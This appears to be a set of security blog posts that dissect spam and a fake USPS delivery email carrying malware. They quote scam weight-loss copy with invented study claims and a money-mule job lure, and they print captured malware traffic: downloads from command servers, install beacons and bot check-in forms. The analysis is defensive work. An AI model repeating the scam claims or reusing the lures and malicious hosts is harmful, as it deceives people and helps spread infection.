DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=[MASKED]; s=s1024; t=1359040577; bh=cN14SojoLblKRf6oS1cY473Oc3GiW/F1dba0gHFgGgc=; h=X-[MASKED]-Newman-Id:Message-ID:X-[MASKED]-Newman-Property:X-YMail-OSG:X-[MASKED]-SMTP:Received:Date:To:From:Subject; b=rZMs6Mva2xNpAMZkIjWNk2CiN8dFlAbngq8pbVqI7bnv82/3rZI8nQE/WVCNMUZkHjpu4sI4poKQmxIkIJGj3shcB5o7IU5NYlSdTQfKb09fH93yLn+iHXFJwWYrhkS3t+2/dR3argiMf6LiRMe9uVNVt02gNwmHVBjZ9YfT1rs=
X-[MASKED]-Newman-Id: 590626.21120.bm@smtp214.mail.gq1.[MASKED]
Message-ID: <590626.21120.bm@smtp214.mail.gq1.[MASKED]>
X-[MASKED]-Newman-Property: ymail-3
X-YMail-OSG: VLOtm8cVM1m564kSA6UHHdYlgAnpHlaymFYSz3qUPWp.LVu
vc._XVVwDAjKz5O0cifdkG525d7wF_5IDhJ7SJhcIiY_XQxU9jSCbw1oUoSu
Scmspf.MOcQAWrChR7E503C569BAWKy_q3T2i27avSd_mUqguC8mxsYc9_5w
76WnQk85r6eSESEt6pZi3eQMfvGZztUniRY.USVFP6_thkKydTw6crzAIeS3
LwDCBc0IbMOeFYWYbp7S3iwf7UEz.rklUYzgMjv0fQJZtRN.VZ9w2jSASgpq
H5IbSSvzBxnCfDVlA6Pc5dvW8qbTjITDiyXtBKaBOaZ5NaYHtxCYR.GN83qO
.YpspYeFEko6teoqKC_R2oXFIAZOJaGPkFDsFtwkfg0DRxC8wUQSXrrcfK2s
_6mNwk5ryq6os9AeTTbpXcwsjC7tGGaOPmXUVsTwBb.NBm_Lnxc3ciUdXo2v
VxAFXaG_MxgxVIoBJG5QfguwHG36QbDr.wArnaLgQ4ThyEWrn9R53nrr3ev3
EmGMl6hSb05V0AsFF.1kSd5iEbYAu3HnjJk09Du33yyOKc1HmC0kFA6mLlBq
p
X-[MASKED]-SMTP: sQwBf5iswBAXLY1VLMrSfxDYup3vqrAqJMOs
Received: from localhost (may_raynaholic@109.93.128.35 with login)
by smtp214.mail.gq1.[MASKED] with SMTP; 24 Jan 2013 07:16:17 -0800 PST
Date: Thu, 24 Jan 2013 06:34:33 -0700 (PDT)
To: "christoperj@"
From: Ace Marcinko
Subject: great
X-CTCH-RefID: str=0001.0A0C0209.51015047.00DB,ss=1,re=0.000,recu=0.000,reip=0.000,cl=1,cld=1,fgs=0
X-CTCH-VOD: Unknown
X-CTCH-Spam: Unknown
X-CTCH-Score: 0.000
X-CTCH-Rules:
X-CTCH-Flags: 0
X-CTCH-ScoreCust: 0.000
X-CTCH-SenderID: may_raynaholic@[MASKED]
X-CTCH-SenderID-TotalMessages: 1
X-CTCH-SenderID-TotalSpam: 0
X-CTCH-SenderID-TotalSuspected: 0
X-CTCH-SenderID-TotalBulk: 0
X-CTCH-SenderID-TotalConfirmed: 0
X-CTCH-SenderID-TotalRecipients: 0
X-CTCH-SenderID-TotalVirus: 0
X-CTCH-SenderID-BlueWhiteFlag: 0

http://indianriverna [DOT] com/disapproveafraidnicholasparker/

General Scam Text from (#1) and (#2) http://weightlossthatworkisnotmagicpill [DOT] com/diet/garcinia/index [DOT] html:
Note : Garcinia Cambogia has sold out in most major stores. As of Monday, January 28, 2013 it's still Available Online

FACTUAL STUDY: HYDROXYCITRIC ACID IN GARCINIA CAMBOGIA BURNS FAT. 15 LB. LOSS MONTHLY!

Normally, I don't recommend "weight-loss" supplements, especially weight-loss supplements that claim "easy" weight loss or "fast" weight loss. As a nutritionist, I strongly believe that the key to weight loss is a healthy diet and exercise, but there are some incredible superfoods that can deliver an added boost. One superfood in particular, Garcinia Cambogia, is creating major media buzz, and the research has me truly amazed. What has me and the scientific community so excited about Garcinia Cambogia extract is that people don't have to do anything different when taking this food supplement. They don't need to exercise, and they don't need to diet; they just appear to lose pounds fast.

Garcinia Cambogia Extract, America's Hottest New Way To A Flat Belly:

Let's cut to the chase: The most recent study on Garcinia Cambogia published in the Diabetes, Metabolic Syndrome and Obesity journal followed a group of 16 adults who supplemented with Garcinia Cambogia for only 12 weeks. Over the course of the study, the subjects lost an average of 17 pounds each - this was 10.5% of their overall body weight and 16% of their overall body fat!

There were no side effects reported. This is very exciting information and one reason why I think that Garcinia Cambogia could be an effective weapon against the obesity epidemic in our country.

Garcinia Cambogia stands above other products on the market. Most products on the market get their extract from a different source than that of the clinical studies. They do this to cut down on costs, but at the same time, it cuts down on effectiveness. In addition, they don't give the correct dose. By having a cheaper more inferior product, customers need to buy more in order to have the same results. If they see small weight loss, they buy more of it. It might be good business, but poor practice.

Every order of Garcinia Cambogia is a one-time-only transaction. In other words, there are absolutely no reoccurring charges or hidden offers.
(And so on. . .)

General Scam Text from (#3) http://weightlossthatworkisnotmagicpill [DOT] com/diet/GreenCoffeDiet-c/index [DOT] html:
Note: Green Coffee Extract has sold out in most major stores. As of Monday, January 28, 2013 it's still Available Online

Denton Stores Struggle to Keep the Popular Fat Burner in Stock Normally, I don't recommend "weight-loss" supplements, especially weight-loss supplements that claim "easy" weight loss or "fast" weight loss. As a nutritionist, I strongly believe that the key to weight loss is a healthy diet and exercise, but there are some incredible superfoods that can deliver an added boost. One superfood in particular, the green coffee bean, is creating major media buzz, and the research has me truly amazed.

What has me and the scientific community so excited about green coffee bean extract is that people don't have to do anything different when taking this food supplement. They don't need to exercise, and they don't need to diet; they just appear to lose pounds fast.

How Green Coffee Extract Helps You Burn More Fat:

Let's cut to the chase: The most recent study on green coffee bean published in the Diabetes, Metabolic Syndrome and Obesity journal followed a group of 16 adults who supplemented with green coffee bean for only 12 weeks. Over the course of the study, the subjects lost an average of 17 pounds each - this was 10.5% of their overall body weight and 16% of their overall body fat! There were no side effects reported. This is very exciting information and one reason why I think that green coffee bean could be an effective weapon against the obesity epidemic in our country.

Green Coffee Extract, America's Hottest New Way To A Flat Belly:

Let's cut to the chase: The most recent study on green coffee bean published in the Diabetes, Metabolic Syndrome and Obesity journal followed a group of 16 adults who supplemented with green coffee bean for only 12 weeks. Over the course of the study, the subjects lost an average of 17 pounds each - this was 10.5% of their overall body weight and 16% of their overall body fat!

There were no side effects reported. This is very exciting information and one reason why I think that green coffee bean could be an effective weapon against the obesity epidemic in our country.

What To Expect With Pure Green Coffee:

We're sure you've tried a lot of different weight loss products that all promise to do amazing things then don't deliver. That shouldn't be the case, so we're going to tell you what we experienced when we tried Pure Green Coffee

You may be wondering if you can get the same effects from the coffee you drink with breakfast in the morning - and the truth is that you can't. When you roast coffee beans, you remove the chlorogenic acid. Green coffee beans are unroasted, have little aroma and are extremely bitter - because they contain over 50% chlorogenic acid. Remember, as I've always said, when it comes to your health, "Bitter is better." Because the green coffee bean is so bitter, I recommend taking it in capsule form. I suggest finding 800 mg pure green coffee bean capsules Take one capsule about 30 minutes before meals; I recommend taking them two or three times per day with a full glass of water for the best results. And remember that combining green coffee bean with a healthy diet and exercise can improve your results!

Every order of Pure Green Coffee is a one-time-only transaction. In other words, there are absolutely no reoccurring charges or hidden offers.
(And so on. . .)

Thursday, November 15, 2012

Sorry -- It Wasn't Me

Based on all the NDR's received in the last hour, it's apparently my turn to have an email address spoofed and used to send out crap spam.

Sorry -- it was neither me nor my machine.

Looks like the one example below came through:

1) An open MTA relay in Barcelona, Spain (84.77.221.194)

2) Via a what was claimed to be a Saudi Arabian registered domain (odcqcngjocqxmidqclbfogqwi [DOT] twarn [DOT] com/sendmail [DOT] php)

3) Which may or may not be hosted out of Haarlem, Netherlands via 94.75.242.21

But the subdomain does not resolve, so the parent domain was probably spoofed as well. Not that it matters anyway as whoever is sending out this crap is probably using some automated script and long list of open email relays all over the world.

Good times. . .


Delivery to the following recipient failed permanently:

no@[MASKED]

Technical details of permanent failure:
[MASKED] tried to deliver your message, but it was rejected by the recipient domain. We recommend contacting the other email provider for further information about the cause of this error. The error that the other server returned was: 550 550 : invalid address (state 13).

----- Original message -----

Received: by 10.14.223.4 with SMTP id u4mr6449274eep.19.1353005631303;
Thu, 15 Nov 2012 10:53:51 -0800 (PST)
Received: by 10.14.223.4 with SMTP id u4mr6449270eep.19.1353005631268;
Thu, 15 Nov 2012 10:53:51 -0800 (PST)
Return-Path: <[MASKED]>
Received: from [MASKED] ([MASKED] [[MASKED]])
by [MASKED] with SMTP id f7si31086453eeo.10.2012.11.15.10.53.35;
Thu, 15 Nov 2012 10:53:51 -0800 (PST)
Received-SPF: neutral ([MASKED]: 84.77.221.194 is neither permitted nor denied by domain of [MASKED]) client-ip=84.77.221.194;
Authentication-Results: [MASKED]; spf=neutral ([MASKED]: 84.77.221.194 is neither permitted nor denied by domain of [MASKED]) smtp.mail=[MASKED]
Received: from [84.77.221.194] ([84.77.221.194]) by [MASKED] ([[MASKED]]) with SMTP;
Thu, 15 Nov 2012 18:53:51 GMT
Received: from apache by odcqcngjocqxmidqclbfogqwi.momix.org with local (Exim 4.67)
(envelope-from <<[MASKED]>,
>)
id C6W6Y5-I31H64-NL
for <[MASKED]>,
; Thu, 15 Nov 2012 20:02:18 +0100
To: <[MASKED]>,

Subject: Company founded in Gibraltar is currently looking for European sector based labor force.
X-PHP-Script: odcqcngjocqxmidqclbfogqwi [DOT] twarn [DOT] com/sendmail [DOT] php for 84.77.221.194
From: <[MASKED]>,

X-Sender: <[MASKED]>,

X-Mailer: PHP
X-Priority: 1
Content-Type: text/plain; charset="us-ascii"
Message-Id:
Date: Thu, 15 Nov 2012 20:02:18 +0100
X-pstn-neptune: 0/0/0.00/0
X-pstn-levels: (S: 0.05735/99.21816 CV:99.9000 FC:95.5390 LC: 0.1839 R:95.9108 P:95.9108 M:94.5035 C:98.6951 )
X-pstn-dkim: 0 skipped:not-enabled
X-pstn-status: off
X-pstn-nxpr: disp=neutral, envrcpt=no@[MASKED]
X-pstn-nxp: bodyHash=f531f188e1f1c756d317b3245f7d51df0f393c9f, headerHash=37f1102fb2cfa2015526df5b21447c478d39434e, keyName=4, rcptHash=59b9110a6577d0310ea9cb90ad957b516216f26a, sourceip=84.77.221.194, version=1
X-pstn-nxpr: disp=neutral, envrcpt=no@[MASKED]
X-pstn-nxp: bodyHash=f531f188e1f1c756d317b3245f7d51df0f393c9f, headerHash=37f1102fb2cfa2015526df5b21447c478d39434e, keyName=4, rcptHash=59b9110a6577d0310ea9cb90ad957b516216f26a, sourceip=84.77.221.194, version=1
X-Gm-Message-State: ALoCoQmIQYS68JJUosWRXDptmnZEI6/Xr6CwYpj31j0Moj9XWIHUnEmDT9cNvqr76MIkq5TtKjLgMVPJj1uxVLfSacsO0bqgIFEmAgkQTYvbkIjQBHE7ss+iohLEWnAdGN1/S2TDH8re

Business providing product offerings in the E-Commerce and Information Technology market sectors presently
recruiting employment personnel from Europe.

5,000 Euros per month compensation in exchange for simply a few working hours put forth each day, plus a 5.0% bonus.

What we require from applicant:
- POA (Power of Attorney) or Proprietorship of a business or similar
- Replying to e-mails originating from us, each day
- Stay consistently current with every assigned task
If this interests you, please submit the following information to our business e-mail:

- Full Name
- Telephone # in the International Syntax Format
- E-mail address
- Current age

Please respond to:Jeanette@europs-consulting [DOT] com.

Don't utilize the reply option.
Sincerely,
Department of Human Resources

Thursday, August 30, 2012

No, USPS Did Not Fail to Deliver a Package This Week

Started receiving alerts claiming to be from the USPS concerning a package that could not be delivered.

This is a new take on an old trick, and a 'low-budget' one at that. Whatever the case, this email is also very much malicious. My fully patched Windows 7 sandbox was quickly popped by the bug without any effort. It also did not seem to matter that the user-id was had only limited user privileges and I received no UAC approval window when it was triggered. Very disturbing.

There's no visible text in the email when displayed as HTML. But there is hidden text in the background that is probably intended to make the message appear legitimate to spam filters. The text itself appears to be pulled from 3 novels which have long since found their way into the public domain:

From "Artemus Ward (his travels) among the Mormons, Part 1" by John Camden Hotten (originally published in 1865)
. . .Sometimes they introduce a full brass and string band in Church. Brigham Young says the devil has monopolized the good music long enough, and it is high time the Lord had a portion of it. . .

From "A Fleece of Gold: Five Lessons from the Fable of Jason and Golden Fleece" by Charles Steward Given (originally published in 1905)
. . .Galen, the famous anatomist, after a prolonged study of the human hand, conceiving it to be the proximate instrument of the soul, was forced to renounce atheism, to acknowledge the existence of a Supreme Being. . .

From "The Entire PG Works by George Meredith, Volume 1 of 10" by George Meredith (originally published in 1851)
. . .Richard mechanically sat down on the crumbling flints to rest, and listened to the panting of the dog. Sprinkled at his feet were emerald lights: hundreds of glow- worms studded the dark dry ground. . .

I wonder how the original email author came upon these three distinctly different novels as even in an internet connected world, it seems unlikely that these are just the result of a "What novels should I quote to bypass spam filters?" Google search

That said, the user only sees a low quality jpg image (pulled from http://bdedieu [DOT] perso [DOT] neuf [DOT] fr/HIDVRTXUKI [DOT] jpg) when they open the message claiming that USPS failed to deliver a package. . .
USPS.COM
Unfortunately, we failed to deliver the postal package you have sent on the 27th of august in time, because the recipient's address is erroneous.

Please go to the nearest UPS office and show your shipping label.

If the parcel isn't received within 30 working days our company will have the right claim compensation from you for each day of keeping.
Low quality JPG referring to a phantom parcel
Low quality JPG referring to a phantom parcel

Not sure why I would be taking a USPS/United States Postal Service receipt to a UPS/United Parcel Service office, but whatever.

Clicking on the image sends the user to http://bdedieu [DOT] perso [DOT] neuf [DOT] fr/XREOWCDHOS [DOT] htm, which has only a very simple javascript within commanding the browser to download a file named Label_Copy_USPS [DOT] zip. . .
Javascript to download the Label_Copy_USPS file
Javascript to download the Label_Copy_USPS file

The zip file itself contains a malicious file named Label_Copy_USPS [DOT] exe, with an embeded icon that makes it look like a MSWord document to the untrained eye.
Not really a word document, no matter what it says
Not really a word document, no matter what it says
Unique File Details:
Filename -- Label_Copy_USPS [DOT] exe
File size -- 88576 bytes (86.5 KB)
Filetype -- PE32 executable for MS Windows (GUI) Intel 80386 32-bit (Win32 Executable Generic)
MD5 Hash -- 7c35f845a49f95e6797ee89073cf1d89
SHA1 Hash -- 8dc099b23270b70a42dad714a230c4b51eb06175
SHA256 Hash -- 254dd09af71c45cbad147aa523cf7f277340c1e0799fba9b36f20942f295c63d
Online malware scanners identified the file as:
AntiVir -- TR/Crypt.ZPACK.Gen
Avira -- TR/Crypt.ZPACK.Gen
Eset -- Win32/Kryptik.ALDT (Variant)
F-Prot -- W32/Falab.J6.gen!Eldorado
Kaspersky Lab -- Trojan-Downloader.Win32.Kuluoz.ar
McAfee -- Generic BackDoor.adp
Norman -- W32/Obfuscated.D!genr
Sophos -- Mal/EncPk-AGK

The file also appears to have authentic metadata information, though it could just as easily be another misdirect.
File Description: Fatal Hums 32
Company: EPoX
File Version: 2.2.0.1112
Date Created: 8/30/2012 6:57 AM
Size: 86.5 KB

Opened the file in the sandbox and confirmed it's malicious nature.

It appears to execute, but doesn't display anything but an empty document in notepad named "Label_Copy_USPS". Not sure if that's just for appearance, or if it's exploiting something in notepad on my fully patched sandbox machine.
Just an empty notepad document
Just an empty notepad document

The Label_Copy_USPS.exe file with the MSWord icon has also been replaced with an empty text file named Label_Copy_USPS.txt.

After that, nothing else. At least for a few minutes.

Then I get a popup for something called Security Monitor claiming:
Security Monitor: WARNING!

Attention! System detected a potential hazard (TrojanSPM/LX) on your computer
that may infect executable files. Your private information and PC Safety
is at risk.
To get rid of unwanted spyware and keep your computer safe you need to update your computer security software.
Click Yes to download official intrusion detection system (IDS software)
Bogus Security Monitor Warning
Bogus Security Monitor Warning

Followed by an ominous systemtray flag. . .
WARNING!
Application cannot be executed. The file notepad.exe is infected.

Please activate your antivirus software.
Bogus Infected File Flag
Bogus Infected File Flag

And then conveniently a scan from Live Security Platinum (one of the Fake Antivirus variants) which I of course didn't knowingly install. . .
Live Security Platinum (one of the Fake Antivirus variants)
Live Security Platinum (one of the Fake Antivirus variants)

I've seen these before, and it always amuses me how it claims certain applications are infected on machine (even though they are not actually installed)

But whatever the case, it throws the expected "Your machine is infected with many malicious bugs, It is highly recommended that you remove all the threats from your computer immediately" message.
Bogus Infected Machine Warning
Bogus Infected Machine Warning

And of course clicking on the button takes the user to an online website asking for a credit card number.

Basically anything that I did on the machine from this point on triggered an alert claiming that whatever application I was trying to open was infected, right after the process was terminated for my 'safety'

But that's not all that's going on. . .

Behind the scenes, this all starts with a HTTP connection on TCP84 to a Netherlands IP (93.184.100.116) and pulled down another malicious exe file named 3b0c6a8305cc89cf77f3c9616a569e78 [DOT] exe. . .
GET /d0f7718d96B962A24D5DB24495EF4073722C70A2F37B8ED45222F5F57F5006B4F30287DE5E832CD19BA0C26553344C35D1833C79DC573864758807A47C3CED5B939DECA6688F364B7F8C HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 93.184.100.116:84

HTTP/1.1 200 OK
Server: nginx/0.8.55
Date: Thu, 30 Aug 2012 20:53:14 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.3-7+squeeze13
Vary: Accept-Encoding
Content-Length: 49

c=run&u=/get/3b0c6a8305cc89cf77f3c9616a569e78 [DOT] exeGET //get/3b0c6a8305cc89cf77f3c9616a569e78 [DOT] exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C)
Host: 93.184.100.116:84
Connection: Keep-Alive

HTTP/1.1 200 OK
Server: nginx/0.8.55
Date: Thu, 30 Aug 2012 20:53:14 GMT
Content-Type: application/x-msdos-program
Connection: keep-alive
Last-Modified: Thu, 30 Aug 2012 20:30:04 GMT
ETag: "ddc0f1-66a00-4c8818a54eb00"
Accept-Ranges: bytes
Content-Length: 420352

MZ......................@...............................................!..L.!This program cannot be run in DOS mode. [FILE CONTINUES]

And then it pulls yet another malicious file, passF [DOT] dll [DOT] crp. . .
GET /d0f7718d96B962A24D5DB24495EF4073722C70A2F37B8ED45222F5F57F5006B4F30287DE5E832CD19BA0C26553344C35D1833C79DC573864758807A47C3CED5B939DECA6688F364B7F8C HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 93.184.100.116:84

HTTP/1.1 200 OK
Server: nginx/0.8.55
Date: Thu, 30 Aug 2012 20:55:18 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.3-7+squeeze13
Vary: Accept-Encoding
Content-Length: 49

c=rdl&u=/get/passF.dll.crp&a=0&k=00005f73&n=passFGET //get/passF.dll.crp HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 93.184.100.116:84

HTTP/1.1 200 OK
Server: nginx/0.8.55
Date: Thu, 30 Aug 2012 20:55:18 GMT
Content-Type: application/x-msdos-program
Connection: keep-alive
Last-Modified: Fri, 24 Aug 2012 12:47:50 GMT
ETag: "ddc0f8-1a9e00-4c80262356980"
Accept-Ranges: bytes
Content-Length: 1744384

>...p_..w_......._..s_..3_..s_..s_..s_..s_..s_..s_..s_..s_..{^..}@..s...R..L.~Th., p.0gr.2 c.1no..beS-unS6n 7.S .0de]R

W_..s_..+...oO..oO..[FILE CONTINUES]

And because that clearly wasn't enough, it connects to Hong Kong (175.41.28.156) to log itself as 'installed'. . .
GET /api/stats/install/?ts=26070510&affid=41100&ver=3060001&group=liv HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent:
Host: 175.41.28.156

HTTP/1.1 200 OK
Server: nginx/1.2.3
Date: Thu, 30 Aug 2012 20:56:18 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 0
Connection: keep-alive

Then the bug downloads silently completes a form in Kazakhstan (195.210.47.109) and downloads a spam email template. . .
POST /index.php HTTP/1.1
Host: 195.210.47.109:80:80
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 6.1; SV1; .NET CLR 1.1.4777)
Accept: */*
Accept-Language: en-gb
Accept-Encoding: deflate
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 746

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="sid"
0549571111555245

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="up"
13849612

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="wbfl"
1

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="v"
137

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="ping"
457

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="guid"
{DAB0CFA5-8A9B-4160-8DA8-8F2A01AC8EF6}

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="wv"
6#2#1#0#7601#0

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="sr"
0

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="ar"
0

--1BEF0A57BE110FD467A--
HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Thu, 30 Aug 2012 20:56:30 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/5.3.3-7+squeeze13
Vary: Accept-Encoding
f4a

HTTP/1.1 200 OK
Date: Thu, 30 Aug 2012 20:56:29 GMT
Server: Apache/2.2.16
Content-Length: 55876
Connection: close
Content-Type: multipart/form-data; boundary="1BEF0A57BE110FD467A"

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="COMMON"; filename="COMMON.BIN"
Content-Type: application/octet-stream

'hr.%+./".,****...)/.'4hr.%.'ywtxp%.'m%.***.'4m%.'h%**/5)+)5)/,5*#)!#/.*,(5)(+5*(*5*-#!#/.*,(5##5.5(!#+.*##5*(#5".5*((!#/.)+(5*(+5*)"5.#!#/.)+"5)+5,#5)/*!#/.-#5*,(5*#)5*)#!#/.,)5..[FILE CONTINUES]

Once downloaded, the sandbox becomes a mailzombie and starts blasting the world. . .

Meanwhile. . . the bug is also trying to pull down more badness from Germany (78.159.108.83). . .
GET /ajax/libs/jquery/1.6.4/jquery [DOT] min [DOT] js HTTP/1.1
Accept: */*
Referer: http://chechoutbiz [DOT] com/p/liv/?group=liv&ver=3060001&reject_url=http%3A%2F%2Fchechoutbiz [DOT] com%3A80%2Fp%2Fdecline%2F%3Fgroup%3Dliv%26ver%3D3060001%26nid%3DD0F7718D%26affid%3D41100&nid=D0F7718D&affid=41100

Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C)
Connection: Keep-Alive

HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Type: text/javascript; charset=UTF-8
Last-Modified: Mon, 02 Apr 2012 18:24:28 GMT
Date: Thu, 30 Aug 2012 18:41:47 GMT
Expires: Fri, 30 Aug 2013 18:41:47 GMT
X-Content-Type-Options: nosniff

Server: sffe
Content-Length: 32103
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=31536000
Age: 8101

............y..../....MD...j..v.%`C...-..K..aS.....H.Zr......SU(......}...(.j=u.:K.i.l...|....U.?{..M..M...........C.p.-..2.W...i.....U./.+?VIpo...[?.....v.:....O.*[.Q.0...j...?l.(..<[FILE CONTINUES]

And then yet another file from Missouri (209.20.78.241) via TCP84. . .
GET /d0f7718d96B962A24D5DB24495EF4073722C70A2F37280D51B2FB5E0240E44F8B14D849155C63ADBC2A2CA31 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 209.20.78.241:84

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Thu, 30 Aug 2012 21:03:11 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.3-7+squeeze13
Vary: Accept-Encoding
Content-Length: 225

..9.......Q0.r+..W..As..yP........k....mEq.v..j!...fg.@.o?.Y....|.4rh.....5^.....{.j..q.SK.q.....U..........'2.e9..IrKJe.,zSo/..o.a8_.cf.......~(MD.+.P.........f...?......M..^{Q.|.f...@.;.%Y.(.K..8PF..S..\l.%..W..v.&8a.KR....

And then back to Germany (slopokan21 [DOT] ru) to fill out another online form. . .
POST /index [DOT] php HTTP/1.1
Host: slopokan21 [DOT] ru:80
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 6.1; SV1; .NET CLR 1.1.4777)
Accept: */*
Accept-Language: en-gb
Accept-Encoding: deflate
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 2936

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="sid"
2505323811778201

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="up"
14097139

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="wbfl"
0

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="v"
137

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="ping"
457

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="guid"
{DAB0CFA5-8A9B-4160-8DA8-8F2A01AC8EF6}

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="wv"
6#2#1#0#7601#29

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="ms"
758019024:121:2000:0:0:0:25:0:0:0:0:0:0:0:0:0:0

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="smtx"
CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="sr"
0

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="ar"
0

--1BEF0A57BE110FD467A--
HTTP/1.0 303 See Other
Location: http://slopokan21 [DOT] ru:80/index [DOT] php
Content-Length: 0
Connection: close
Date: Thu, 30 Aug 2012 21:00:40 GMT

The connections and downloads continue with zero sign of stopping. And again, all of this is taking place silently behind the scenes without the user ever knowing.

Good times


Original source email (minus the HTML formatting):
Delivered-To: christoperj
Received: by 10.231.42.212 with SMTP id t20csp39528ibe;
Thu, 30 Aug 2012 09:52:10 -0700 (PDT)
Received: by 10.50.236.39 with SMTP id ur7mr1239726igc.62.1346345530047;
Thu, 30 Aug 2012 09:52:10 -0700 (PDT)
Return-Path:
Received: from mailforward. (mailforward.. [10.10.10.23])
by mx. with ESMTP id i2si3576532icy.69.2012.08.30.09.52.09;
Thu, 30 Aug 2012 09:52:10 -0700 (PDT)
Received-SPF: neutral (: 10.10.10.23 is neither permitted nor denied by best guess record for domain of www@suzan.yourwebhost [DOT] com) client-ip=10.10.10.23;
Authentication-Results: mx.; spf=neutral (: 10.10.10.23 is neither permitted nor denied by best guess record for domain of www@suzan.yourwebhost [DOT] com) smtp.mail=www@suzan.yourwebhost [DOT] com
Received: from mx1. (inbound-us1. [70.87.28.133])
by mailforward. (Postfix) with ESMTP id 72C0E162C3C6
for ; Thu, 30 Aug 2012 16:52:09 +0000 (GMT)
Received: from suzan.yourwebhost [DOT] com (suzan [DOT] yourwebhost [DOT] com [209.239.43.1])
by mx1. (Postfix) with ESMTP id 58343471681
for ; Thu, 30 Aug 2012 16:52:09 +0000 (GMT)
Received: (from www@localhost)
by suzan.yourwebhost [DOT] com (8.14.3/8.12.10) id q7UGq3Uc015428;
Thu, 30 Aug 2012 12:52:03 -0400
Date: Thu, 30 Aug 2012 12:52:03 -0400
Message-Id: <201208301652 .q7ugq3uc015428=".q7ugq3uc015428" com="com" suzan="suzan" yourwebhost="yourwebhost">
To: christoperj
Subject: Delivery refuse ID#36556
From: "USPS Customer Service"
X-Mailer: CF-XPInformer
Reply-To: "USPS Customer Service"
Mime-Version: 1.0
Content-Type:multipart/mixed;boundary="----------1346345523503F9A33361C5"
X-CTCH-Spam: Suspect
X-CTCH-VOD: Unknown
X-CTCH-RefID: str=0001.0A0B0209.503F9A39.0103,ss=2,re=0.000,recu=0.000,reip=0.000,cl=2,cld=1,fgs=0



------------1346345523503F9A33361C5


[LINK TO http://bdedieu [DOT] perso [DOT] neuf [DOT] fr/XREOWCDHOS [DOT] htm" USING IMAGE FILE POINTING TO http://bdedieu [DOT] perso.neuf [DOT] fr/HIDVRTXUKI [DOT] jpg"]

